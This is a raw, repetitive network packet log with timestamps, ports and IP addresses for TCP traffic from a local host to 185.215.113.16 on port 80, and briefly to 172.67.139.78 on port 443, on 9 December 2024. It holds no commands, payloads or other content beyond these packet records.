                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.301062107 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.301083088 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.301126003 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.302109957 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.302154064 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.302184105 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.302223921 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.303474903 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.303488016 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.303522110 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.303538084 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.304574966 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.304615021 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.305103064 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.305151939 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.305824041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.305943966 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.305969000 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.305986881 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.307209015 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.307413101 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.307477951 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.308346987 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.308568001 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.308612108 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.309544086 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.309586048 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.309652090 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.309892893 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.310817957 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.310863018 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.311134100 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.311173916 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.312021971 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.312072039 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.312182903 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.312237978 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.313285112 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.313368082 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.313415051 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.314527035 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.314686060 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.314733982 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.315876961 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.315922022 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.316054106 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.317056894 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.317105055 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.317338943 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.318222046 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.318268061 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.318537951 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.318581104 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.319607019 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.319798946 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.319843054 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.320841074 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.320967913 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.321014881 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.322099924 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.322258949 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.322304964 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.323251009 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.323301077 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.379503965 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.379591942 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.379693031 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.379987955 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.380153894 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.380199909 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.381206036 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.381324053 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.381558895 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.382433891 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.382529974 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.382958889 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.383917093 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.383985043 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.385502100 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.385546923 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.385895014 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.385905981 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.385967016 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.387119055 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.387240887 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.387306929 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.387814999 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.388087034 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.388243914 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.388298035 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.388981104 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.389027119 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.389065981 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.389137030 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.389892101 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.390019894 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.390074968 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.462722063 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.462789059 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.462901115 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.463217974 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.463334084 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.463387012 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.464050055 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.464091063 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.464135885 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.465034008 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.465075970 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.465420008 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.465888977 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.466135025 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.466496944 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.466540098 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.467036963 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.467163086 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.467204094 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.468164921 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.468377113 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.468420029 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.469101906 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.469178915 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.469223022 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.470242023 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.470271111 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.470287085 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.470309973 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.471244097 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.471302986 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.471343994 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.472254992 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.472271919 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.472316980 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.473097086 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.473278999 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.473330021 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.474142075 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.474179029 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.474299908 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.474875927 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.475351095 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.475735903 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.475764990 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.476161003 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.476486921 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.476528883 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.477277040 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.477313042 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.477466106 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.477886915 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.478396893 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.478418112 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.478430986 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.478451967 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.479248047 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.479443073 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.479480028 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.480230093 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.480348110 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.480391026 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.481230021 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.481267929 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.481334925 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.482306004 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.482357025 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.482439041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.483302116 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.483320951 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.483351946 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.483361959 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.484249115 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.484426975 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.484466076 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.485388994 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.485402107 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.485439062 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.486288071 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.486341000 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.486512899 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.486875057 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.487318993 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.487360954 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.487454891 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.487493992 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.488291979 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.488333941 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.488944054 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.488982916 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.489357948 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.489392996 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.489531994 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.489569902 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.490535021 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.490747929 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.490782976 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.491467953 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.491590977 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.491631985 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.492399931 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.492413044 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.492444038 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.493477106 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.493984938 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.494029045 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.494359970 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.494401932 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.494421959 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.495479107 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.495523930 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.495939970 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.496417046 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.496483088 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.496597052 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.496656895 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.497730017 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.497884989 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.497930050 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.498487949 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.498838902 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.498877048 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.499468088 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.499505997 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.499618053 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.499891043 CET44349899172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.499948025 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.499996901 CET44349899172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.500111103 CET49899443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.500132084 CET49899443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.500495911 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.500540018 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.500835896 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.500879049 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.501467943 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.501514912 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.501599073 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.501636028 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.502691031 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.502738953 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.502954006 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.503576040 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.503648043 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.503820896 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.503839970 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.503854036 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.504654884 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.504750967 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.504905939 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.505538940 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.505583048 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.570954084 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.571105003 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.571180105 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.571346045 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.571649075 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.571738005 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.572514057 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.572566032 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.572730064 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.573687077 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.573728085 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.573842049 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.573899031 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.573960066 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.574001074 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.574850082 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.574898958 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.574948072 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.574985981 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.575792074 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.575846910 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.576114893 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.576157093 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.576944113 CET8049898185.215.113.16192.168.2.6
